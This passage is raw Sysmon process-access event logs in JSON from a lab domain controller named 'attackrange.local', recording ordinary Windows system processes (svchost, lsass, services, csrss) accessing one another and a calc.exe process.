dll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5333,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5334,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5335,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.672\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.672","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5336,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.672\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010344E0A00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.672","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010344E0A00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5337,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.672\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010344E0A00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.672","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010344E0A00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5338,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010344E0A00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010344E0A00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5339,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.687\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010344E0A00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.687","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010344E0A00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5340,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.719\r\nSourceProcessGUID: {A837DB8D-032D-5F25-0000-0010344E0A00}\r\nSourceProcessId: 3472\r\nSourceThreadId: 3744\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010F94B0A00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\SysWOW64\\calc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\appxdeploymentserver.dll+645cb|c:\\windows\\system32\\appxdeploymentserver.dll+2d35e|c:\\windows\\system32\\appxdeploymentserver.dll+2d19d|c:\\windows\\system32\\appxdeploymentserver.dll+1140e6|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.719","SourceProcessGUID":"{A837DB8D-032D-5F25-0000-0010344E0A00}","SourceProcessId":"3472","SourceThreadId":"3744","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010F94B0A00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\SysWOW64\\calc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\appxdeploymentserver.dll+645cb|c:\\windows\\system32\\appxdeploymentserver.dll+2d35e|c:\\windows\\system32\\appxdeploymentserver.dll+2d19d|c:\\windows\\system32\\appxdeploymentserver.dll+1140e6|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
